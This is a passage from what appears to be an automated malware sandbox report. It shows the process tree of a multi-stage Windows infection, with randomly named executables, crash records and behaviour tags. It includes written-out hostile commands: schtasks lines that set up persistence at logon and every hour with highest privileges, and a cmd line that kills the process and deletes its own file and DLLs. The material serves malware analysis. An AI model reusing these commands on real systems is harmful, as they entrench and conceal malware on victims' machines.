C:\Users\Admin\Documents\SNakg8l92RQIruFBk67Hlbqo.exe"C:\Users\Admin\Documents\SNakg8l92RQIruFBk67Hlbqo.exe"8⤵PID:8704
-
-
C:\Users\Admin\Documents\yKlAn4PvSTKCx88WwWHG4VZA.exe"C:\Users\Admin\Documents\yKlAn4PvSTKCx88WwWHG4VZA.exe"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:8696 -
C:\Users\Admin\AppData\Roaming\5403941.exe"C:\Users\Admin\AppData\Roaming\5403941.exe"9⤵PID:8260
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8260 -s 234010⤵
- Program crash
- Checks processor information in registry
PID:8708
-
-
-
C:\Users\Admin\AppData\Roaming\7114776.exe"C:\Users\Admin\AppData\Roaming\7114776.exe"9⤵
- Suspicious behavior: SetClipboardViewer
PID:3020
-
-
C:\Users\Admin\AppData\Roaming\4672625.exe"C:\Users\Admin\AppData\Roaming\4672625.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:9832
-
-
C:\Users\Admin\AppData\Roaming\7159097.exe"C:\Users\Admin\AppData\Roaming\7159097.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:7744
-
-
C:\Users\Admin\AppData\Roaming\7395402.exe"C:\Users\Admin\AppData\Roaming\7395402.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:8124 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8124 -s 242810⤵
- Program crash
- Checks processor information in registry
PID:9344
-
-
-
-
C:\Users\Admin\Documents\SmHXGPnK2fLsnBWVOkT0F0NM.exe"C:\Users\Admin\Documents\SmHXGPnK2fLsnBWVOkT0F0NM.exe"8⤵PID:8688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 2409⤵
- Program crash
PID:5564
-
-
-
C:\Users\Admin\Documents\jpA77AgySW7sfVniBQjZ1yhV.exe"C:\Users\Admin\Documents\jpA77AgySW7sfVniBQjZ1yhV.exe"8⤵PID:8672
-
-
C:\Users\Admin\Documents\_Jq3YLQlDA_X3IkFmTbX6W8l.exe"C:\Users\Admin\Documents\_Jq3YLQlDA_X3IkFmTbX6W8l.exe"8⤵PID:8564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8564 -s 2409⤵
- Program crash
PID:9612
-
-
-
C:\Users\Admin\Documents\uUfuwMR7FnjkfGmGGtYHszFQ.exe"C:\Users\Admin\Documents\uUfuwMR7FnjkfGmGGtYHszFQ.exe"8⤵
- Drops file in Program Files directory
PID:8556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST9⤵
- Creates scheduled task(s)
PID:9324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST9⤵
- Checks processor information in registry
- Creates scheduled task(s)
- Suspicious behavior: EnumeratesProcesses
PID:5004
-
-
C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"9⤵PID:8488
-
C:\Users\Admin\Documents\4E2okkG0RhkG7yFwX0nD9yg9.exe"C:\Users\Admin\Documents\4E2okkG0RhkG7yFwX0nD9yg9.exe"10⤵PID:10016
-
C:\Users\Admin\AppData\Roaming\8110651.exe"C:\Users\Admin\AppData\Roaming\8110651.exe"11⤵
- Suspicious behavior: SetClipboardViewer
PID:10960
-
-
C:\Users\Admin\AppData\Roaming\7577952.exe"C:\Users\Admin\AppData\Roaming\7577952.exe"11⤵
- Suspicious use of AdjustPrivilegeToken
PID:10036 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 10036 -s 232412⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4436
-
-
-
C:\Users\Admin\AppData\Roaming\5074643.exe"C:\Users\Admin\AppData\Roaming\5074643.exe"11⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7600
-
-
C:\Users\Admin\AppData\Roaming\1960639.exe"C:\Users\Admin\AppData\Roaming\1960639.exe"11⤵
- Suspicious use of AdjustPrivilegeToken
PID:6492
-
-
C:\Users\Admin\AppData\Roaming\3356549.exe"C:\Users\Admin\AppData\Roaming\3356549.exe"11⤵PID:6376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 240012⤵
- Program crash
PID:5152
-
-
-
-
C:\Users\Admin\Documents\m3Ja9ur_6ReA0SXuhKT0RDj7.exe"C:\Users\Admin\Documents\m3Ja9ur_6ReA0SXuhKT0RDj7.exe"10⤵PID:9788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9788 -s 27611⤵
- Program crash
PID:10544
-
-
-
-
-
C:\Users\Admin\Documents\zlyImSK26IBykcHoASNnbKyH.exe"C:\Users\Admin\Documents\zlyImSK26IBykcHoASNnbKyH.exe"8⤵PID:8548
-
C:\Users\Admin\Documents\zlyImSK26IBykcHoASNnbKyH.exe"C:\Users\Admin\Documents\zlyImSK26IBykcHoASNnbKyH.exe"9⤵PID:3336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im zlyImSK26IBykcHoASNnbKyH.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\zlyImSK26IBykcHoASNnbKyH.exe" & del C:\ProgramData\*.dll & exit10⤵PID:10736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im zlyImSK26IBykcHoASNnbKyH.exe /f11⤵
- Kills process with taskkill
PID:5556
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
PID:10272
-
-
-
-
-
C:\Users\Admin\Documents\51Z98hPE2_Sp0BcHFgjXoCkt.exe"C:\Users\Admin\Documents\51Z98hPE2_Sp0BcHFgjXoCkt.exe"8⤵PID:9088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9088 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1772
-
-
-
C:\Users\Admin\Documents\s8qMe5DQvH79dq5CqcZIYqPw.exe"C:\Users\Admin\Documents\s8qMe5DQvH79dq5CqcZIYqPw.exe"8⤵PID:4088
-
-
C:\Users\Admin\Documents\pTxDixyymHBFysS1ylbD5q7A.exe"C:\Users\Admin\Documents\pTxDixyymHBFysS1ylbD5q7A.exe"8⤵PID:5632
-
-
C:\Users\Admin\Documents\bUFOtZhRCMl30Z0yUWpuMSRk.exe"C:\Users\Admin\Documents\bUFOtZhRCMl30Z0yUWpuMSRk.exe"8⤵
- Drops file in Program Files directory
PID:884
-
-
C:\Users\Admin\Documents\YwtCpV3hd3zMNN_FMGNST8w7.exe"C:\Users\Admin\Documents\YwtCpV3hd3zMNN_FMGNST8w7.exe"8⤵PID:1192
-
-
C:\Users\Admin\Documents\8h6USrIaswFY8EancLRU5NTB.exe"C:\Users\Admin\Documents\8h6USrIaswFY8EancLRU5NTB.exe"8⤵PID:9212
-
-
C:\Users\Admin\Documents\qdOynxK3fJZbLJNh_JFTCD9d.exe"C:\Users\Admin\Documents\qdOynxK3fJZbLJNh_JFTCD9d.exe"8⤵PID:9204
-
C:\Users\Admin\AppData\Roaming\4192131.exe"C:\Users\Admin\AppData\Roaming\4192131.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:8300 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8300 -s 227210⤵
- Program crash
- Checks processor information in registry
PID:9792
-
-
-
C:\Users\Admin\AppData\Roaming\2727179.exe"C:\Users\Admin\AppData\Roaming\2727179.exe"9⤵
- Suspicious behavior: SetClipboardViewer
PID:8024
-
-
C:\Users\Admin\AppData\Roaming\5292272.exe"C:\Users\Admin\AppData\Roaming\5292272.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Users\Admin\AppData\Roaming\2064906.exe"C:\Users\Admin\AppData\Roaming\2064906.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:6604
-
-
C:\Users\Admin\AppData\Roaming\7256249.exe"C:\Users\Admin\AppData\Roaming\7256249.exe"9⤵PID:10008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10008 -s 220410⤵
- Program crash
- Checks processor information in registry
PID:4820
-
-
-
-
C:\Users\Admin\Documents\Q3_gfBgX1wwa8U4Y2OcBnxb3.exe"C:\Users\Admin\Documents\Q3_gfBgX1wwa8U4Y2OcBnxb3.exe"8⤵PID:9192
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe"C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe"8⤵
- Suspicious use of SetThreadContext
PID:9080 -
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9480
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10132
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5972
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8244
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6088
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6540
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8512
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9904
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9740
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1336
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:2092
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8360
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:3764
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8448
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7080
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10496
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11056
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10432
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5832
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11224
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10596
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1556
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7236
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9312
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:2392
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11160
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9592
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10928
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10892
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10868
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1488
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5800
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6648
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1808
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1532
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11252
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6508
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5344
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9800
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9392
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4288
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9076
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9308
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9460
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:9016
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:3736
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10224
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4032
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵
- Suspicious use of AdjustPrivilegeToken
PID:8260
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵
- Suspicious use of AdjustPrivilegeToken
PID:6376
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:2196
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8740
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1812
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:3164
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8588
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1188
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7032
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7304
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1652
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7528
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11192
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5196
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5672
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:3052
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10284 -s 2810⤵
- Program crash
- Checks processor information in registry
PID:10492
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4872
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8856
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:8448
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7944
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4424
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7928
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4016
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:1492
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10040
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 2810⤵
- Program crash
- Checks processor information in registry
PID:5040
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:2536
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6564
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:668
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12728 -s 2810⤵
- Program crash
- Enumerates system info in registry
PID:12912
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13260
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12796 -s 2810⤵
- Program crash
- Enumerates system info in registry
PID:7332
-
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12456
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13300
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13236
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12928
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7876
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:10780
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:4568
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13216
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9300
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:904
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:5792
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13904
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13392
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13952
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13404
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:8492
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13620
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:7872
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13944
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13412
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:12448
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:13788
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11400
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:11668
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:2012
-
-
C:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exeC:\Users\Admin\Documents\lBobHeUIxCiZQkJ8azQApo1T.exe9⤵PID:6612
-
-
